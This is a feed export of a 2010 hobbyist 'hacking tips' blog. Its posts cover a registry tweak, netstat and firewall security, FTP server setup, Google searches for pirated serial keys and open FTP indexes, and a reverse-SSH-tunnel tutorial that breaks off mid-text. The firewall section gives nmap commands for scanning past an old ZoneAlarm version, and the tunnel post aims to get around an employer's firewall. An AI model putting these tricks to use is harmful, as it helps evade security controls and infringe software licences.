<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8668264831440713284</id><updated>2011-11-27T18:11:49.520-08:00</updated><title type='text'>Need More Input</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>69</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-818806065364750355</id><published>2010-02-11T13:31:00.001-08:00</published><updated>2010-02-11T13:31:31.942-08:00</updated><title type='text'>Change The Default Location For Installing Apps</title><content type='html'>As the size of hardrives increase, more people are using partitions to seperate and store groups of files.&lt;br /&gt;&lt;br /&gt;XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.&lt;br /&gt;&lt;br /&gt;Run the Registry Editor (regedit)and go to&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion&lt;br /&gt;&lt;br /&gt;Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-818806065364750355?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/818806065364750355/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/change-default-location-for-installing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/818806065364750355'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/818806065364750355'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/change-default-location-for-installing.html' title='Change The Default Location For Installing Apps'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7813747430731687718</id><published>2010-02-11T13:30:00.002-08:00</published><updated>2010-02-11T13:31:07.312-08:00</updated><title type='text'>Closing Open Holes, System Security How to close open holes</title><content type='html'>With the spread of Hackers and Hacking incidents, the time has come, when not only system administrators of servers of big companies, but also people who connect to the Internet by dialing up into their ISP, have to worry about securing their system. It really does not make much difference whether you have a static IP or a dynamic one, if your system is connected to the Internet, then there is every chance of it being attacked.&lt;br /&gt;&lt;br /&gt;This manual is aimed at discussing methods of system security analysis and will shed light on as to how to secure your standalone (also a system connected to a LAN) system.&lt;br /&gt;&lt;br /&gt;Open Ports: A Threat to Security?&lt;br /&gt;&lt;br /&gt;In the Netstat Tutorial we had discussed how the netstat -a command showed the list of open ports on your system. Well, anyhow, before I move on, I would like to quickly recap the important part. So here goes, straight from the netstat tutorial:&lt;br /&gt;&lt;br /&gt;Now, the ??a? option is used to display all open connections on the local machine. It also returns the remote system to which we are connected to, the port numbers of the remote system we are connected to (and the local machine) and also the type and state of connection we have with the remote system.&lt;br /&gt;&lt;br /&gt;For Example,&lt;br /&gt;&lt;br /&gt;C:\windows&gt;netstat -a&lt;br /&gt;&lt;br /&gt;Active Connections&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State&lt;br /&gt;TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED&lt;br /&gt;TCP ankit:1036 dwarf.box.sk:ftp-data TIME_WAIT&lt;br /&gt;TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2&lt;br /&gt;TCP ankit:1045 mail2.mtnl.net.in:pop3 TIME_WAIT&lt;br /&gt;TCP ankit:1052 zztop.boxnetwork.net:80 ESTABLISHED&lt;br /&gt;TCP ankit:1053 mail2.mtnl.net.in:pop3 TIME_WAIT&lt;br /&gt;UDP ankit:1025 *:*&lt;br /&gt;UDP ankit:nbdatagram *:*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now, let us take a single line from the above output and see what it stands for:&lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State&lt;br /&gt;TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED&lt;br /&gt;&lt;br /&gt;Now, the above can be arranged as below:&lt;br /&gt;&lt;br /&gt;Protocol: TCP (This can be Transmission Control Protocol or TCP, User Datagram Protocol or UDP or sometimes even, IP or Internet Protocol.)&lt;br /&gt;&lt;br /&gt;Local System Name: ankit (This is the name of the local system that you set during the Windows setup.)&lt;br /&gt;&lt;br /&gt;Local Port opened and being used by this connection: 1031&lt;br /&gt;&lt;br /&gt;Remote System: dwarf.box.sk (This is the non-numerical form of the system to which we are connected.)&lt;br /&gt;&lt;br /&gt;Remote Port: ftp (This is the port number of the remote system dwarf.box.sk to which we are connected.)&lt;br /&gt;&lt;br /&gt;State of Connection: ESTABLISHED&lt;br /&gt;&lt;br /&gt;?Netstat? with the ??a? argument is normally used, to get a list of open ports on your own system i.e. on the local system. This can be particularly useful to check and see whether your system has a Trojan installed or not. Yes, most good Antiviral software are able to detect the presence of Trojans, but, we are hackers, and need to software to tell us, whether we are infected or not. Besides, it is more fun to do something manually than to simply click on the ?Scan? button and let some software do it.&lt;br /&gt;&lt;br /&gt;The following is a list of Trojans and the port numbers which they use, if you Netstat yourself and find any of the following open, then you can be pretty sure, that you are infected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Port 12345(TCP) Netbus&lt;br /&gt;Port 31337(UDP) Back Orifice&lt;br /&gt;&lt;br /&gt;For complete list, refer to the Tutorial on Trojans at: hackingtruths.box.sk/trojans.txt&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Now, the above tutorial resulted in a number of people raising questions like: If the 'netstat -a' command shows open ports on my system, does this mean that anyone can connect to them? Or, How can I close these open ports? How do I know if an open port is a threat to my system's security of not? Well, the answer to all these question would be clear, once you read the below paragraph:&lt;br /&gt;&lt;br /&gt;Now, the thing to understand here is that, Port numbers are divided into three ranges:&lt;br /&gt;&lt;br /&gt;The Well Known Ports are those from 0 through 1023. This range or ports is bound to the services running on them. By this what I mean is that each port usually has a specific service running on it. You see there is an internationally accepted Port Numbers to Services rule, (refer RFC 1700 Here) which specifies as to on what port number a particular service runs. For Example, By Default or normally FTP runs on Port 21. So if you find that Port 21 is open on a particular system, then it usually means that that particular system uses the FTP Protocol to transfer files. However, please note that some smart system administrators delibrately i.e. to fool lamers run fake services on popular ports. For Example, a system might be running a fake FTP daemon on Port 21. Although you get the same interface like the FTP daemon banner, response numbers etc, however, it actually might be a software logging your prescence and sometimes even tracing you!!!&lt;br /&gt;&lt;br /&gt;The Registered Ports are those from 1024 through 49151. This range of port numbers is not bound to any specific service. Actually, Networking utlites like your Browser, Email Client, FTP software opens a random port within this range and starts a communication with the remote server. A port number within this range is the reason why you are able to surf the net or check your email etc.&lt;br /&gt;&lt;br /&gt;If you find that when you give the netstat -a command, then a number of ports within this range are open, then you should probably not worry. These ports are simply opened so that you can get your software applications to do what you want them to do. These ports are opened temporarily by various applications to perform tasks. They act as a buffer transfering packets (data) received to the application and vis-a-versa. Once you close the application, then you find that these ports are closed automatically. For Example, when you type www.hotmail.com in your browser, then your browser randomly chooses a Registered Port and uses it as a buffer to communicate with the various remote servers involved.&lt;br /&gt;&lt;br /&gt;The Dynamic and/or Private Ports are those from 49152 through 65535. This range is rarely used, and is mostly used by trojans, however some application do tend to use such high range port numbers. For Example,Sun starts their RPC ports at 32768.&lt;br /&gt;So this basically brings us to what to do if you find that Netstat gives you a couple of open ports on your system:&lt;br /&gt;&lt;br /&gt;1. Check the Trojan Port List and check if the open port matches with any of the popular ones. If it does then get a trojan Removal and remove the trojan.&lt;br /&gt;&lt;br /&gt;2. If it doesn't or if the Trojan Remover says: No trojan found, then see if the open port lies in the registered Ports range. If yes, then you have nothing to worry, so forget about it.&lt;br /&gt;&lt;br /&gt;***********************&lt;br /&gt;HACKING TRUTH: A common technique employed by a number of system administrators, is remapping ports. For example, normally the default port for HTTP is 80. However, the system administrator could also remap it to Port 8080. Now, if that is the case, then the homepage hosted at that server would be at:&lt;br /&gt;&lt;br /&gt;http://domain.com:8080 instead of&lt;br /&gt;http://domain.com:80&lt;br /&gt;&lt;br /&gt;The idea behind Port Remapping is that instead of running a service on a well known port, where it can easily be exploited, it would be better to run it on a not so well known port, as the hacker, would find it more difficult to find that service. He would have to port scan high range of numbers to discover port remapping.&lt;br /&gt;&lt;br /&gt;The ports used for remapping are usually pretty easy to remember. They are choosen keeping in mind the default port number at which the service being remapped should be running. For Example, POP by default runs on Port 110. However, if you were to remap it, you would choose any of the following: 1010, 11000, 1111 etc etc&lt;br /&gt;&lt;br /&gt;Some sysadmins also like to choose Port numbers in the following manner: 1234,2345,3456,4567 and so on... Yet another reason as to why Port Remapping is done, is that on a Unix System to be able to listen to a port under 1024, you must have root previledges.&lt;br /&gt;************************&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Firewalls&lt;br /&gt;&lt;br /&gt;Use of Firewalls is no longer confined to servers or websites or commerical companies. Even if you simply dial up into your ISP or use PPP (Point to Point Protocol) to surf the net, you simply cannot do without a firewall. So what exactly is a firewall?&lt;br /&gt;&lt;br /&gt;Well, in non-geek language, a firewall is basically a shield which protects your system from the untrusted non-reliable systems connected to the Internet. It is a software which listens to all ports on your system for any attempts to open a connection and when it detects such an attempt, then it reacts according to the predefined set of rules. So basically, a firewall is something that protects the network(or systen) from the Internet. It is derived from the concept of firewalls used in vehicles which is a barrier made of fire resistant material protecting the vehicle in case of fire.&lt;br /&gt;&lt;br /&gt;Now, for a better 'according to the bible' defination of a firewall: A firewall is best described as a software or hardware or both Hardware and Software packet filter that allows only selected packets to pass through from the Internet to your private internal network. A firewall is a system or a group of systems which guard a trusted network( The Internal Private Network from the untrusted network (The Internet.)&lt;br /&gt;&lt;br /&gt;NOTE: This was a very brief desciption of what a firewall is, I would not be going into the details of their working in this manual.&lt;br /&gt;&lt;br /&gt;Anyway,the term 'Firewalls', (which were generally used by companies for commerical purposes) has evolved into a new term called 'Personal Firewalls'. Now this term is basically used to refer to firewalls installed on a standalone system which may or may not be networked i.e. It usually connects to an ISP. Or in other words a personal firewall is a firewall used for personal use.&lt;br /&gt;&lt;br /&gt;Now that you have a basic desciption as to what a firewall is, let us move on to why exactly you need to install a Firewall? Or, how can not installing a firewall pose a threat to the security of your system?&lt;br /&gt;&lt;br /&gt;You see, when you are connected to the Internet, then you have millions of other untrusted systems connected to it as well. If somehow someone found out your IP address, then they could do probably anything to your system. They could exploit any vulnerability existing in your system, damage your data, and even use your system to hack into other computers.&lt;br /&gt;&lt;br /&gt;Finding out someone'e IP Address is not very difficult. Anybody can find out your IP, through various Chat Services, Instant Messengers (ICQ, MSN, AOL etc), through a common ISP and numerous other ways. Infact finding out the IP Address of a specific person is not always the priority of some hackers.&lt;br /&gt;&lt;br /&gt;What I mean to say by that is that there are a number of Scripts and utilities available which scan all IP addresses between a certain range for predefined common vulnerabilities. For Example, Systems with File Sharing Enabled or a system running an OS which is vulnerable to the Ping of Death attack etc etc As soon as a vulnerable system is found, then they use the IP to carry out the attacks.&lt;br /&gt;&lt;br /&gt;The most common scanners look for systems with RAT's or Remote Administration Tools installed. They send a packet to common Trojan ports and display whether the victim's system has that Trojan installed or not. The 'Scan Range of IP Addresses' that these programs accept are quite wide and one can easily find a vulnerable system in the matter of minutes or even seconds.&lt;br /&gt;&lt;br /&gt;Trojan Horses like Back Orifice provide remote access to your system and can set up a password sniffer. The combination of a back door and a sniffer is a dangerous one: The back door provides future remote access, while the sniffer may reveal important information about you like your other Passwords, Bank Details, Credit Card Numbers, Social Security Number etc If your home system is connected to a local LAN and the attacker manages to install a backdoor on it, then you probably have given the attacker the same access level to your internal network, as you have. This wouls also mean that you will have created a back door into your network that bypasses any firewall that may be guarding the front door.&lt;br /&gt;&lt;br /&gt;You may argue with me that as you are using a dial up link to your ISP via PPP, the attacker would be able to access your machine only when you are online. Well, yes that is true, however, not completely true. Yes, it does make access to your system when you reconnect, difficult, as you have a dynamic Internet Protocol Address. But, although this provides a faint hope of protection, routine scanning of the range of IP's in which your IP lies, will more often than not reveal your current Dynamic IP and the back door will provide access to your system.&lt;br /&gt;&lt;br /&gt;*******************&lt;br /&gt;HACKING TRUTH: Microsoft Says: War Dialer programs automatically scan for modems by trying every phone number within an exchange. If the modem can only be used for dial-out connections, a War Dialer won't discover it. However, PPP changes the equation, as it provides bidirectional transportmaking any connected system visible to scanners?and attackers.&lt;br /&gt;*******************&lt;br /&gt;&lt;br /&gt;So how do I protect myself from such Scans and unsolicitated attacks? Well, this is where Personal Firewalls come in. They just like their name suggests, protect you from unsolicitated connection probes, scans, attacks.&lt;br /&gt;&lt;br /&gt;They listen to all ports for any connection requests received (from both legitimate and fake hosts) and sent (by applications like Browser, Email Client etc.) As soon as such an instance is recorded, it pops up a warning asking you what to do or whether to allow the connection to initiate or not. This warning message also contains the IP which is trying to initiate the connection and also the Port Number to which it is trying to connect i.e. the Port to which the packet was sent. It also protects your system from Port Scans, DOS Attacks, Vulnerability attacks etc. So basically it acts as a shield or a buffer which does not allow your system to communicate with the untrusted systems directly.&lt;br /&gt;&lt;br /&gt;Most Personal Firewalls have extensive logging facilities which allows you to track down the attackers. Some popular firewalls are:&lt;br /&gt;&lt;br /&gt;1.BlackICE Defender : An IDS for PC's. It's available at http://www.networkice.com.&lt;br /&gt;&lt;br /&gt;2. ZoneAlarm: The easiest to setup and manage firewall. Get it for free at: www.zonelabs.com&lt;br /&gt;&lt;br /&gt;Once you have installed a firewall on your system, you will often get a number of Warnings which might seem to be as if someone is trying to break into your system, however, they are actually bogus messages, which are caused by either your OS itself or due to the process called Allocation of Dynamic IP's. For a details description of these two, read on.&lt;br /&gt;&lt;br /&gt;Many people complain that as soon as they dial into their ISP, their firewall says that such and such IP is probing Port X. What causes them?&lt;br /&gt;Well, this is quite common. The cause is that somebody hung up just before you dialed in and your ISP assigned you the same IP address. You are now seeing the remains of communication with the previous person. This is most common when the person to which the IP was assigned earlier was using ICQ or chat programs, was connected to a Game Server or simply turned off his modem before his communication with remote servers was complete.&lt;br /&gt;&lt;br /&gt;You might even get a message like: Such and Such IP is trying to initaite a Netbios Session on Port X. This again is extrememly common. The following is an explanation as to why it happens, which I picked up a couple of days ago: NetBIOS requests to UDP port 137 are the most common item you will see in your firewall reject logs. This comes about from a feature in Microsoft's Windows: when a program resolves an IP address into a name, it may send a NetBIOS query to IP address. This is part of the background radiation of the Internet, and is nothing to be concerned about.&lt;br /&gt;&lt;br /&gt;What Causes them? On virtually all systems (UNIX, Macintosh, Windows), programs call the function 'gethostbyaddr()' with the desired address. This function will then do the appropriate lookup, and return the name. This function is part of the sockets API. The key thing to remember about gethostbyaddr() is that it is virtual. It doesn't specify how it resolves an address into a name. In practice, it will use all available mechanisms. If we look at UNIX, Windows, and Macintosh systems, we see the following techniques:&lt;br /&gt;&lt;br /&gt;DNS in-addr.arpa PTR queries sent to the DNS server&lt;br /&gt;NetBIOS NodeStatus queries sent to the IP address&lt;br /&gt;lookups in the /etc/hosts file&lt;br /&gt;AppleTalk over IP name query sent to the IP address&lt;br /&gt;RPC query sent to the UNIX NIS server&lt;br /&gt;NetBIOS lookup sent to the WINS server&lt;br /&gt;&lt;br /&gt;Windows systems do the /etc/hosts, DNS, WINS, and NodeStatus techniques. In more excruciating detail, Microsoft has a generic system component called a naming service. All the protocol stacks in the system (NetBIOS, TCP/IP, Novel IPX, AppleTalk, Banyan, etc.) register the kinds of name resolutions they can perform. Some RPC products will likewise register an NIS naming service. When a program requests to resolve an address, this address gets passed onto the generic naming service. Windows will try each registered name resolution subsystem sequentially until it gets an answer.&lt;br /&gt;&lt;br /&gt;(Side note: User's sometimes complained that accessing Windows servers is slow. This is caused by installing unneeded protocol stacks that must timeout first before the real protocol stack is queried for the server name.).&lt;br /&gt;&lt;br /&gt;The order in which it performs these resolution steps for IP addresses can be configured under the Windows registry key&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider.&lt;br /&gt;&lt;br /&gt;Breaking Through Firewalls&lt;br /&gt;&lt;br /&gt;Although Firewalls are meant to provide your complete protection from Port Scan probes etc there are several holes existing in popular firewalls, waiting to be exploited. In this issue, I will discuss a hole in ZoneAlarm Version 2.1.10 to 2.0.26, which allows the attacker to port scan the target system (Although normally it should stop such scans.)&lt;br /&gt;&lt;br /&gt;If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the packet through and will not notify the user. This means, that one can TCP or UDP port scan a ZoneAlarm protected computer as if there were no firewall there IF one uses port 67 as the source port on the packets.&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;UDP Scan:&lt;br /&gt;You can use NMap to port scan the host with the following command line:&lt;br /&gt;&lt;br /&gt;nmap -g67 -P0 -p130-140 -sU 192.168.128.88&lt;br /&gt;&lt;br /&gt;(Notice the -g67 which specifies source port).&lt;br /&gt;&lt;br /&gt;TCP Scan:&lt;br /&gt;You can use NMap to port scan the host with the following command line:&lt;br /&gt;&lt;br /&gt;nmap -g67 -P0 -p130-140 -sS 192.168.128.88&lt;br /&gt;&lt;br /&gt;(Notice the -g67 which specifies source port).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7813747430731687718?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7813747430731687718/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/closing-open-holes-system-security-how.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7813747430731687718'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7813747430731687718'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/closing-open-holes-system-security-how.html' title='Closing Open Holes, System Security How to close open holes'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-5308280826577513362</id><published>2010-02-11T13:30:00.001-08:00</published><updated>2010-02-11T13:30:22.441-08:00</updated><title type='text'>Create An Ftp Server On Your Pc With Serv-u</title><content type='html'>Requirements:&lt;br /&gt;Serv-U&lt;br /&gt;No-IP.com Website&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Step 1. Getting a static IP address.&lt;br /&gt;Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.&lt;br /&gt;&lt;br /&gt;1. Go to www.No-IP.com to create a new user account.&lt;br /&gt;2. Fill in the information that is required and the click Register button.&lt;br /&gt;3. Your account has now been created and your account password has been emailed to you.&lt;br /&gt;4. Check your email mailbox and wait for the mail that contains your password&lt;br /&gt;5. Go back to www.No-IP.com and type your email address and password to login to your account.&lt;br /&gt;6. Once in your account, click on Add a host in the left menu&lt;br /&gt;7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)&lt;br /&gt;8. Check Allow Wildcards and click the Submit button&lt;br /&gt;9. You now have your static address (example: rkchoolie.serveftp.com)&lt;br /&gt;10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client&lt;br /&gt;11. Once downloaded, install the software and type in your email address and password when asked.&lt;br /&gt;12. Finally tick the checkbox near your static address.&lt;br /&gt;&lt;br /&gt;You now have a static web address .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Step 2. Installing and setting the FTP server&lt;br /&gt;1. Install Serv-U 4.0.&lt;br /&gt;2. Start Serv-U and use the wizard to setup your ftp.&lt;br /&gt;3. Click next until you're asked for an IP address, leave it blank and then click next.&lt;br /&gt;4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.&lt;br /&gt;5. You are asked if you want to allow anonymous access, select No and then click next.&lt;br /&gt;6. You are then asked to create a named account, check yes and then click next.&lt;br /&gt;7. Type in the user name you wish for this account (example: Harrie) and click next.&lt;br /&gt;8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.&lt;br /&gt;9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.&lt;br /&gt;10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.&lt;br /&gt;11. The account is now set so click finish.&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Step 3. Configuring user accounts&lt;br /&gt;1. In the left tree-menu, select the account you've just created and then click on the General tab.&lt;br /&gt;2. Check Hide ‘Hidden’ Files.&lt;br /&gt;3. Check Allow only and enter the number one in the box.&lt;br /&gt;4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.&lt;br /&gt;5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)&lt;br /&gt;6. Now, click on the Dir Access tab.&lt;br /&gt;7. You should see the home folder in there. Highlight it and make your permissions.&lt;br /&gt;8. If you only want users to be able to download check only Read, List, &amp; Inherit.&lt;br /&gt;9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, &amp; Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.&lt;br /&gt;10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.&lt;br /&gt;11. There are many other different sets of permissions you can play with. I just covered your basics.&lt;br /&gt;12. Your server is now set!&lt;br /&gt;13. Try logging on with the username and password and see if it works.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-5308280826577513362?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/5308280826577513362/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/create-ftp-server-on-your-pc-with-serv.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5308280826577513362'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5308280826577513362'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/create-ftp-server-on-your-pc-with-serv.html' title='Create An Ftp Server On Your Pc With Serv-u'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7718666257337992955</id><published>2010-02-11T13:29:00.001-08:00</published><updated>2010-02-11T13:29:42.526-08:00</updated><title type='text'>Easily Find Serial Numbers On Google</title><content type='html'>et's pretend you need a serial number for windows xp pro.&lt;br /&gt;&lt;br /&gt;in the search bar type in just like this - "Windows XP Professional" 94FBR&lt;br /&gt;&lt;br /&gt;the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.&lt;br /&gt;&lt;br /&gt;or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR&lt;br /&gt;&lt;br /&gt;just try it out, it's very quick and it works nicely..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7718666257337992955?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7718666257337992955/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/easily-find-serial-numbers-on-google.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7718666257337992955'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7718666257337992955'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/easily-find-serial-numbers-on-google.html' title='Easily Find Serial Numbers On Google'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-1648069619286619954</id><published>2010-02-11T12:56:00.001-08:00</published><updated>2010-02-11T12:56:30.846-08:00</updated><title type='text'>How To Find Ftp's The Easy Way</title><content type='html'>I use google cuz its the best search engine en everyone can acces .&lt;br /&gt;The easiest search quote is "index of ..."&lt;br /&gt;Some kind of examples are:&lt;br /&gt;&lt;br /&gt;index of ftp/ +mp3&lt;br /&gt;index of ftp/ +divx&lt;br /&gt;index of ftp/ +"whateveryouwant"&lt;br /&gt;&lt;br /&gt;Google has many operators that should help you to specify your search&lt;br /&gt;USE EM&lt;br /&gt;There are also lots of advanced operators available&lt;br /&gt;here are a few:&lt;br /&gt;&lt;br /&gt;cache:&lt;br /&gt;link:&lt;br /&gt;related:&lt;br /&gt;info:&lt;br /&gt;stocks:&lt;br /&gt;site:&lt;br /&gt;allintitle:&lt;br /&gt;intitle:&lt;br /&gt;allinurl:&lt;br /&gt;inurl:&lt;br /&gt;&lt;br /&gt;eg:&lt;br /&gt;allintitle: "index of ftp/mp3"&lt;br /&gt;&lt;br /&gt;try to combine things and maybe u'll find something&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-1648069619286619954?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/1648069619286619954/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-find-ftps-easy-way.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1648069619286619954'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1648069619286619954'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-find-ftps-easy-way.html' title='How To Find Ftp&apos;s The Easy Way'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-1412182058111539216</id><published>2010-02-11T12:45:00.000-08:00</published><updated>2010-02-11T12:46:27.462-08:00</updated><title type='text'>HowTo: Create a Reverse SSH Tunnel</title><content type='html'>Written by Steve Lake&lt;br /&gt;Posted on: Jun 20, 2008 at 08:06am&lt;br /&gt;Section: Tutorials&lt;br /&gt;Printer Friendly Version&lt;br /&gt;Legacy URL&lt;br /&gt;&lt;br /&gt;There are times in your life that you may find yourself in need of accessing some files on your office computer from home, but unable to due to your company employing a firewall to protect their network from hackers. Since a snowball has a better chance of surviving in hell than you do of getting your network administrator to open a port in the firewall so you can SSH into your work computer from home, you're going to need to come up with another way to get access to your machine. This is where a Reverse SSH Tunnel will come in handy. The command to do this is extremely simple. From your work computer, type the following:&lt;br 